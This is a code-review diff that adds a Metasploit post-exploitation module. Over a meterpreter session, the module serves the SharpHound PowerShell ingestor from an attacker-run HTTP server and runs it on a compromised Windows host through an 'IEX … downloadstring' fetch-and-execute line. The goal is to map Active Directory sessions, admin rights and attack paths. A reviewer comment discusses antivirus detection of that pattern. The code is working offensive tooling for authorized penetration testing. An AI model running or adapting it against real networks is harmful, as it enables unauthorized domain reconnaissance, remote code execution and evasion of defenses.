modules/post/windows/gather/bloodhound.rb

```diff
@@ -0,0 +1,61 @@
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Post::Windows::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'BloodHound Ingestor',
+      'Description'   => %q{
+        This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. With this information BloodHound will easily identify highly complex attack paths that would otherwise be impossible to quickly identify within an Active Directory environment.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'h4ng3r <h4ng3r@computerpirate.me>' ],
+      'References'    => [ 'URL', 'https://github.com/BloodHoundAD/BloodHound/' ],
+      'Platform'      => [ 'win' ],
+      'Arch'          => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'  => [ 'meterpreter' ],
+    ))
+
+    register_options([
+      OptString.new('MAXLOOPTIME', [ true, 'MaxLoopTime in 0d0h0m0s format by default there is not max time', '0' ]),
+      OptString.new('COLLECTIONMETHOD', [ true, 'The collection method to use. This parameter accepts a comma separated list of values. Accepted values are Default, Group, LocalAdmin, RDP, DCOM, GPOLocalGroup, Session, ObjectProps, ComputerOnly, LoggedOn, Trusts, ACL, Container, DcOnly, All', 'Default']),
+    ])
+
+  end
+
+  def on_request_uri(cli, _request)
+    base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "SharpHound.ps1"))
+    send_response(cli, base_script)
+  end
+
+  def run
+    if not have_powershell?
+      fail_with(Failure::Unknown, "PowerShell is not installed")
+    end
+
+    start_service()
+    uri = get_uri()
+
+    tmp_path = get_env('TEMP')
+    process, _pid, _c = execute_script("IEX (new-object net.webclient).downloadstring('#{uri}'); Invoke-BloodHound -CollectionMethod #{datastore['COLLECTIONMETHOD']} -MaxLoopTime #{datastore['MAXLOOPTIME']} -CompressData -RemoveCSV -CSVFolder \"#{tmp_path}\"")
```

Comment:
not sure about AV detection of this. (including commercial solutions and custom signatures for `IEX..downloadString`)

just asking.. should not be better an approach a là `kiwi` extension?